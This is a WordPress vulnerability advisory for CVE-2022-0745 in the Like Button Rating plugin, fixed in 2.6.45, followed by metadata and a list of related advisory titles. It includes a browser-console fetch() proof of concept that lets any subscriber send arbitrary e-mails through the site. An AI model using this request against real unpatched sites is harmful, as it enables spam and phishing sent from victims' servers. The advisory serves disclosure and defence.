Like Button Rating < 2.6.45 – Arbitrary e-mail Sending | CVE 2022-0745 | Plugin Vulnerabilities

Description

The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body

Proof of Concept

As a subscriber, run the below command in the web developer console of the browser

fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "options[likebtn_notify_to]=recipient@example.com&options[likebtn_notify_subject]=hehehe&options[likebtn_notify_text]=Hopsasa</b><h1>",
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

likebtn-like-button

Fixed in 2.6.45

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

180f8e87-1463-43bb-a901-80031127723a

Timeline

Publicly Published

2022-05-23 (about 3 years ago)

Added

2022-05-23 (about 3 years ago)

Last Updated

2023-02-19 (about 2 years ago)

Other

Published

Title

Published

2024-01-10

Title

EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

Published

2025-03-31

Title

WP Mobile Bottom Menu < 1.4.1 - Missing Authorization

Published

2024-04-22

Title

WordPress Meta Data and Taxonomies Filter (MDTF) < 1.3.3.1 - Missing Authorization

Published

2025-12-11

Title

PDF for Contact Form 7 + Drag and Drop Template Builder < 6.3.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Duplication

Published

2025-10-14

Title

Find And Replace content for WordPress <= 1.1 - Missing Authorization to Unauthenticated Stored Cross-Site Scripting